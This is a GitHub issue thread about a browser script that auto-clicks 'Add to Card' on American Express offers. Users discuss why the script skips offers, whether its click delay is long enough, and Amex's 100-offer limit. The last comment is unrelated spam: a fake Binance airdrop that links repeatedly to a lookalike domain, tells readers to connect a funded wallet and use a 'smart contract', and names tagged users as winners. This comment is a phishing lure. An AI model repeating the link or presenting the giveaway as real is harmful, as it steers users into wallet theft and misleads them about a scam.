### ISSUE TITLE
Script is adding every other offer, not each one

### ISSUE THREAD

**Issue by a1ch3mist** [qibinlou/Amex-Offers-Helper#2]
Using Chrome devtools

The script is adding every other offer, not each one. Also seems to occasionally skip more than every other one.

**Comment by qibinlou** [comment]
@a1ch3mist thanks for reporting! Will take a look at the issue

**Comment by qibinlou** [comment]
@a1ch3mist could you help try out latest version https://github.com/qibinlou/Amex-Offers-Helper/blob/master/index.js ? 

Also FYI, there are two categories of offer buttons on the offer list page 1) no-action-required offers 2) action-required offers such as redirecting to trycaviar.com to create an account. This script only help users register no-action-required offers.

**Comment by a1ch3mist** [comment]
It definitely picked up several more. This one did not get added, but seems like it should have with the regular Add to Card?

Spend $300+, get $0 Plan It® fee. Terms apply.
Delta - No Fee Plan It® Offer

**Comment by a1ch3mist** [comment]
It's still missing some. Perhaps you have to delay between each click? AMEX Offers takes a second or two to "register" the click. Tried on an account with 96 offers available.

A 2nd run caught the rest of them.

I did catch a "Sorry About That!" error quickly on the Web page while I was watching it add, so maybe there are occasional server errors?

Is there a 100-limit on the actual added offers as well, or just on the available?

**Comment by qibinlou** [comment]
@a1ch3mist the script waits 2s after each click on `Add To Card` button so there shouldn't be a rate limiting by Amex (at least when I tested it on my account for multiple times). I believe Amex caps the available offers to at most 100 per card in my experience.

Regarding `It's still missing some.`, to clarify, do those missed ones have `Add To Card` text or other labels? The script will only automate the clicks on buttons with `Add To Card` label because those buttons map to no-action-required offers.

**Comment by a1ch3mist** [comment]
Correct, those were offers with the "Add to Card" button. I understand the difference like you said. 2s might not be enough time. I've seen some take longer than that.

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @maxwolff, @dodola, @madaoCN, @revskill10, @gvvynplaine, @yatoZeng, @pingnamo
